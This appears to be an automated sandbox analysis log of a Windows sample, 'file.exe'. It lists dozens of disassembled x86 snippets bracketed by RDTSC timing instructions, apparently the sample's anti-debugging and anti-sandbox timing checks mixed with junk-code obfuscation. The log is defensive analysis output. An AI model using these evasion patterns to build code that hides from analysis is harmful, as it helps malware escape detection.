Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10574D8 second address: 10574DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105706D second address: 1057071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 105F9A3 second address: 105F9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068A71 second address: 1068A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068A75 second address: 1068A87 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F4B9132D698h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1068A87 second address: 1068A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B9CC second address: 106B9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B9D0 second address: 106B9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107227E second address: 107228A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4B9132D69Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10724F9 second address: 107251C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F4B90BE622Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F4B90BE622Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107251C second address: 1072529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107293D second address: 1072941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072941 second address: 107294F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107294F second address: 1072953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072953 second address: 1072957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072BFF second address: 1072C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072C16 second address: 1072C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1072C1C second address: 1072C51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4B90BE6236h 0x0000000f jmp 00007F4B90BE6235h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1084218 second address: 1084225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F4B9132D696h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10840B2 second address: 10840C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F4B90BE6226h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F4B90BE6226h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10840C9 second address: 10840E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D69Ah 0x0000000c jp 00007F4B9132D696h 0x00000012 jns 00007F4B9132D696h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10840E9 second address: 10840EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10840EE second address: 10840F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089252 second address: 1089279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 jmp 00007F4B90BE6230h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089279 second address: 1089296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10964EF second address: 1096512 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F4B90BE6236h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1096293 second address: 1096299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B020A second address: 10B021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B021B second address: 10B0236 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D698h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e je 00007F4B9132D696h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B0236 second address: 10B023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B023A second address: 10B0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AEF41 second address: 10AEF4D instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6226h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AEF4D second address: 10AEF7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F4B9132D696h 0x00000016 jmp 00007F4B9132D69Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF0DA second address: 10AF0DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF3EF second address: 10AF404 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4B9132D69Ah 0x00000008 pushad 0x00000009 jnc 00007F4B9132D696h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF404 second address: 10AF43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6236h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4B90BE6235h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AF5AB second address: 10AF5D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F4B9132D6B2h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFBF8 second address: 10AFC17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6237h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFC17 second address: 10AFC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFEF5 second address: 10AFEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFEFB second address: 10AFF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10AFF02 second address: 10AFF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B18E7 second address: 10B18EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B18EF second address: 10B18F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B419A second address: 10B41A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B43F3 second address: 10B43F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B43F8 second address: 10B43FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B4722 second address: 10B4779 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B90BE6228h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F4B90BE6228h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+12468C38h], edi 0x0000002f push dword ptr [ebp+122D37E0h] 0x00000035 mov dword ptr [ebp+12477CBBh], edi 0x0000003b push 73D0F7A9h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F4B90BE622Bh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B4779 second address: 10B4787 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F4B9132D696h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B4787 second address: 10B478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0E87 second address: 4AD0E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0E8B second address: 4AD0E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0E91 second address: 4AD0EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, dx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0EBF second address: 4AD0ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6230h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0DE8 second address: 4AC0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0DEC second address: 4AC0DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0DF0 second address: 4AC0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0DF6 second address: 4AC0E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 7F999D0Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jmp 00007F4B90BE6230h 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0E1C second address: 4AC0E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0E21 second address: 4AC0E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0E27 second address: 4AC0E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0E2B second address: 4AC0E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F4B90BE6235h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00BE5 second address: 4B00BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00BE9 second address: 4B00BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00BED second address: 4B00BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00AC second address: 4AA00B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00B2 second address: 4AA00EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F4B9132D69Eh 0x00000010 mov esi, 4F7CA5E1h 0x00000015 pop eax 0x00000016 mov dx, 6592h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00EC second address: 4AA00F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00F0 second address: 4AA00F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00F6 second address: 4AA00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00FC second address: 4AA0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0100 second address: 4AA0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4B90BE6232h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4B90BE622Dh 0x00000019 sbb al, FFFFFFC6h 0x0000001c jmp 00007F4B90BE6231h 0x00000021 popfd 0x00000022 call 00007F4B90BE6230h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0155 second address: 4AA0171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0171 second address: 4AA0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6233h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0189 second address: 4AA01C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F4B9132D6A3h 0x00000014 pop eax 0x00000015 mov ecx, ebx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0232 second address: 4AA0238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06D5 second address: 4AC06DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06DA second address: 4AC06E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06E0 second address: 4AC06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06E4 second address: 4AC06E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06E8 second address: 4AC0759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a jmp 00007F4B9132D6A8h 0x0000000f pushfd 0x00000010 jmp 00007F4B9132D6A2h 0x00000015 adc esi, 72489578h 0x0000001b jmp 00007F4B9132D69Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 jmp 00007F4B9132D6A6h 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4B9132D69Ah 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0759 second address: 4AC0768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC061B second address: 4AC061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC061F second address: 4AC062E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC062E second address: 4AC063F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop esi 0x0000000e mov dl, E1h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC063F second address: 4AC0645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0645 second address: 4AC0649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0649 second address: 4AC064D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC064D second address: 4AC065C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC065C second address: 4AC0660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0660 second address: 4AC0666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0666 second address: 4AC066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC066C second address: 4AC0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC03FE second address: 4AC0416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0416 second address: 4AC046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4B9132D6A9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F4B9132D69Eh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4B9132D6A7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC046B second address: 4AC0471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0471 second address: 4AC0475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0475 second address: 4AC0479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
